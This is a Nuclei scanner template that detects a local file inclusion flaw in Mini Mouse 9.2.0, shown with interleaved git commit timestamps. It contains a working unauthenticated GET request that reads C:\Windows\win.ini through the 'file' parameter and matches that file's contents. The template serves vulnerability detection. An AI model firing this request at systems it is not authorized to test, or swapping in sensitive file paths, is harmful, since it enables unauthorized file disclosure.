nuclei-templates/vulnerabilities/other/minimouse-lfi.yaml

36 lines
890 B
YAML
Raw Normal View History

2021-09-06 08:56:20 +00:00
id: minimouse-lfi
info:
name: Mini Mouse 9.2.0 - Local File Inclusion
2021-09-06 08:56:20 +00:00
author: 0x_Akoko
severity: high
description: Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
reference:
- https://www.exploit-db.com/exploits/49744
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: lfi,edb,minimouse
2021-09-06 08:56:20 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-09-06 08:56:20 +00:00
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
# Enhanced by mp on 2022/07/27